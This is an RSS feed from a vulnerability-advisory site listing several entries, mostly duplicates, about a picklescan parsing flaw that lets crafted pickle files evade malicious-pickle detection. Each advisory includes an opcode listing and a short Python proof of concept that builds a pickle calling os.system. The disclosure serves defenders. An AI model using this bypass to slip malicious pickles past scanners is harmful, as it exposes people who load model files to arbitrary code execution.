<?xml version='1.0' encoding='UTF-8'?>
<?xml-stylesheet href="/static/style.xsl" type="text/xsl"?>
<rss xmlns:atom="http://www.w3.org/2005/Atom" xmlns:content="http://purl.org/rss/1.0/modules/content/" version="2.0">
  <channel>
    <title>Most recent entries from all</title>
    <link>https://cve.radiocsirt.org</link>
    <description>Contains only the most 10 recent entries.</description>
    <docs>http://www.rssboard.org/rss-specification</docs>
    <generator>python-feedgen</generator>
    <language>en</language>
    <lastBuildDate>Tue, 06 Oct 2026 11:11:48 +0000</lastBuildDate>
    <item>
      <title>EUVD-2026-328279</title>
      <link>https://cve.radiocsirt.org/vuln/euvd-2026-328279</link>
      <description>EUVD-2026-328279</description>
      <guid isPermaLink="false">https://cve.radiocsirt.org/vuln/euvd-2026-328279</guid>
    </item>
    <item>
      <title>fkie_cve-2025-71325</title>
      <link>https://cve.radiocsirt.org/vuln/fkie_cve-2025-71325</link>
      <description>&lt;p&gt;picklescan before 0.0.27 contains a parsing logic error in the _list_globals function when handling STACK_GLOBAL opcodes, failing to track arguments in the correct range and allowing malicious pickle files to bypass detection. Attackers can craft pickle files with arguments at position zero to trigger unexpected exceptions and evade security scanning.&lt;/p&gt;</description>
      <content:encoded>&lt;p&gt;picklescan before 0.0.27 contains a parsing logic error in the _list_globals function when handling STACK_GLOBAL opcodes, failing to track arguments in the correct range and allowing malicious pickle files to bypass detection. Attackers can craft pickle files with arguments at position zero to trigger unexpected exceptions and evade security scanning.&lt;/p&gt;</content:encoded>
      <guid isPermaLink="false">https://cve.radiocsirt.org/vuln/fkie_cve-2025-71325</guid>
    </item>
    <item>
      <title>GHSA-9gvj-pp9x-gcfr — Picklescan has pickle parsing logic flaw that leads to malicious pickle file bypass</title>
      <link>https://cve.radiocsirt.org/vuln/ghsa-9gvj-pp9x-gcfr</link>
      <description>&lt;p&gt;&lt;strong&gt;Affected:&lt;/strong&gt; PyPI: picklescan&lt;/p&gt;
&lt;p&gt;### Details
There&amp;#39;s a parsing logic error in picklescan and modelscan while trying to deal with opcode `STACK_GLOBAL`.
Function `_list_globals` when handling `STACK_GLOBAL` at position `n`, it is expected to track two arguments but in wrong range. The loop only consider the range from `1` to `n-1` but forgets to consider the opcode at position `0`. The correct range should be `0` to `n-1`. Attacker can put arg in position `0`, thus the parser can only tract one argument. Then, the exception https://github.com/mmaitre314/picklescan/blob/2a8383cfeb4158567f9770d86597300c9e508d0f/src/picklescan/scanner.py#L281 will be triggered. Thus it can cause detection bypass since the malicious pickle file will trigger unexpected exceptions.&lt;/p&gt;
&lt;p&gt;Example:
```
    0: S    STRING     &amp;#39;os&amp;#39; --&amp;gt; arg 0: STRING (untracked argument due to wrong scanning range)
    6: S    STRING     &amp;#39;system&amp;#39; --&amp;gt; arg 1: STRING (tracked argument)
   16: \x93 STACK_GLOBAL
   17: S    STRING     &amp;#39;ls&amp;#39;
   23: \x85 TUPLE1
   24: R    REDUCE
   25: .    STOP
```&lt;/p&gt;
&lt;p&gt;### PoC
``` python
import pickle
payload = b&amp;#34;S&amp;#39;os&amp;#39;\nS&amp;#39;system&amp;#39;\n\x93S&amp;#39;ls&amp;#39;\n\x85R.&amp;#34;
with open(&amp;#39;bad_pickle.pkl&amp;#39;, &amp;#39;wb&amp;#39;) as f:
    f.write(payload)
pickle.load(open(&amp;#39;bad_pickle.pkl&amp;#39;, &amp;#39;rb&amp;#39;))
```&lt;/p&gt;
&lt;p&gt;### Impact
Detection bypass in both picklescan and modelscan. Note that it also affects the online hugging face pickle scanners, making the malicious pickle file bypass the detection.&lt;/p&gt;
&lt;p&gt;### Fix
To fix the range here, change `range(1, n)` to `range(1, n+1)` to ensure that `n-offset…&lt;/p&gt;</description>
      <content:encoded>&lt;p&gt;&lt;strong&gt;Affected:&lt;/strong&gt; PyPI: picklescan&lt;/p&gt;
&lt;p&gt;### Details
There&amp;#39;s a parsing logic error in picklescan and modelscan while trying to deal with opcode `STACK_GLOBAL`.
Function `_list_globals` when handling `STACK_GLOBAL` at position `n`, it is expected to track two arguments but in wrong range. The loop only consider the range from `1` to `n-1` but forgets to consider the opcode at position `0`. The correct range should be `0` to `n-1`. Attacker can put arg in position `0`, thus the parser can only tract one argument. Then, the exception https://github.com/mmaitre314/picklescan/blob/2a8383cfeb4158567f9770d86597300c9e508d0f/src/picklescan/scanner.py#L281 will be triggered. Thus it can cause detection bypass since the malicious pickle file will trigger unexpected exceptions.&lt;/p&gt;
&lt;p&gt;Example:
```
    0: S    STRING     &amp;#39;os&amp;#39; --&amp;gt; arg 0: STRING (untracked argument due to wrong scanning range)
    6: S    STRING     &amp;#39;system&amp;#39; --&amp;gt; arg 1: STRING (tracked argument)
   16: \x93 STACK_GLOBAL
   17: S    STRING     &amp;#39;ls&amp;#39;
   23: \x85 TUPLE1
   24: R    REDUCE
   25: .    STOP
```&lt;/p&gt;
&lt;p&gt;### PoC
``` python
import pickle
payload = b&amp;#34;S&amp;#39;os&amp;#39;\nS&amp;#39;system&amp;#39;\n\x93S&amp;#39;ls&amp;#39;\n\x85R.&amp;#34;
with open(&amp;#39;bad_pickle.pkl&amp;#39;, &amp;#39;wb&amp;#39;) as f:
    f.write(payload)
pickle.load(open(&amp;#39;bad_pickle.pkl&amp;#39;, &amp;#39;rb&amp;#39;))
```&lt;/p&gt;
&lt;p&gt;### Impact
Detection bypass in both picklescan and modelscan. Note that it also affects the online hugging face pickle scanners, making the malicious pickle file bypass the detection.&lt;/p&gt;
&lt;p&gt;### Fix
To fix the range here, change `range(1, n)` to `range(1, n+1)` to ensure that `n-offset…&lt;/p&gt;</content:encoded>
      <guid isPermaLink="false">https://cve.radiocsirt.org/vuln/ghsa-9gvj-pp9x-gcfr</guid>
    </item>
    <item>
      <title>PYSEC-2026-1788 — Picklescan has pickle parsing logic flaw that leads to malicious pickle file bypass</title>
      <link>https://cve.radiocsirt.org/vuln/pysec-2026-1788</link>
      <description>&lt;p&gt;&lt;strong&gt;Affected:&lt;/strong&gt; PyPI: picklescan&lt;/p&gt;
&lt;p&gt;### Details
There&amp;#39;s a parsing logic error in picklescan and modelscan while trying to deal with opcode `STACK_GLOBAL`.
Function `_list_globals` when handling `STACK_GLOBAL` at position `n`, it is expected to track two arguments but in wrong range. The loop only consider the range from `1` to `n-1` but forgets to consider the opcode at position `0`. The correct range should be `0` to `n-1`. Attacker can put arg in position `0`, thus the parser can only tract one argument. Then, the exception https://github.com/mmaitre314/picklescan/blob/2a8383cfeb4158567f9770d86597300c9e508d0f/src/picklescan/scanner.py#L281 will be triggered. Thus it can cause detection bypass since the malicious pickle file will trigger unexpected exceptions.&lt;/p&gt;
&lt;p&gt;Example:
```
    0: S    STRING     &amp;#39;os&amp;#39; --&amp;gt; arg 0: STRING (untracked argument due to wrong scanning range)
    6: S    STRING     &amp;#39;system&amp;#39; --&amp;gt; arg 1: STRING (tracked argument)
   16: \x93 STACK_GLOBAL
   17: S    STRING     &amp;#39;ls&amp;#39;
   23: \x85 TUPLE1
   24: R    REDUCE
   25: .    STOP
```&lt;/p&gt;
&lt;p&gt;### PoC
``` python
import pickle
payload = b&amp;#34;S&amp;#39;os&amp;#39;\nS&amp;#39;system&amp;#39;\n\x93S&amp;#39;ls&amp;#39;\n\x85R.&amp;#34;
with open(&amp;#39;bad_pickle.pkl&amp;#39;, &amp;#39;wb&amp;#39;) as f:
    f.write(payload)
pickle.load(open(&amp;#39;bad_pickle.pkl&amp;#39;, &amp;#39;rb&amp;#39;))
```&lt;/p&gt;
&lt;p&gt;### Impact
Detection bypass in both picklescan and modelscan. Note that it also affects the online hugging face pickle scanners, making the malicious pickle file bypass the detection.&lt;/p&gt;
&lt;p&gt;### Fix
To fix the range here, change `range(1, n)` to `range(1, n+1)` to ensure that `n-offset…&lt;/p&gt;</description>
      <content:encoded>&lt;p&gt;&lt;strong&gt;Affected:&lt;/strong&gt; PyPI: picklescan&lt;/p&gt;
&lt;p&gt;### Details
There&amp;#39;s a parsing logic error in picklescan and modelscan while trying to deal with opcode `STACK_GLOBAL`.
Function `_list_globals` when handling `STACK_GLOBAL` at position `n`, it is expected to track two arguments but in wrong range. The loop only consider the range from `1` to `n-1` but forgets to consider the opcode at position `0`. The correct range should be `0` to `n-1`. Attacker can put arg in position `0`, thus the parser can only tract one argument. Then, the exception https://github.com/mmaitre314/picklescan/blob/2a8383cfeb4158567f9770d86597300c9e508d0f/src/picklescan/scanner.py#L281 will be triggered. Thus it can cause detection bypass since the malicious pickle file will trigger unexpected exceptions.&lt;/p&gt;
&lt;p&gt;Example:
```
    0: S    STRING     &amp;#39;os&amp;#39; --&amp;gt; arg 0: STRING (untracked argument due to wrong scanning range)
    6: S    STRING     &amp;#39;system&amp;#39; --&amp;gt; arg 1: STRING (tracked argument)
   16: \x93 STACK_GLOBAL
   17: S    STRING     &amp;#39;ls&amp;#39;
   23: \x85 TUPLE1
   24: R    REDUCE
   25: .    STOP
```&lt;/p&gt;
&lt;p&gt;### PoC
``` python
import pickle
payload = b&amp;#34;S&amp;#39;os&amp;#39;\nS&amp;#39;system&amp;#39;\n\x93S&amp;#39;ls&amp;#39;\n\x85R.&amp;#34;
with open(&amp;#39;bad_pickle.pkl&amp;#39;, &amp;#39;wb&amp;#39;) as f:
    f.write(payload)
pickle.load(open(&amp;#39;bad_pickle.pkl&amp;#39;, &amp;#39;rb&amp;#39;))
```&lt;/p&gt;
&lt;p&gt;### Impact
Detection bypass in both picklescan and modelscan. Note that it also affects the online hugging face pickle scanners, making the malicious pickle file bypass the detection.&lt;/p&gt;
&lt;p&gt;### Fix
To fix the range here, change `range(1, n)` to `range(1, n+1)` to ensure that `n-offset…&lt;/p&gt;</content:encoded>
      <guid isPermaLink="false">https://cve.radiocsirt.org/vuln/pysec-2026-1788</guid>
    </item>
  </channel>
</rss>
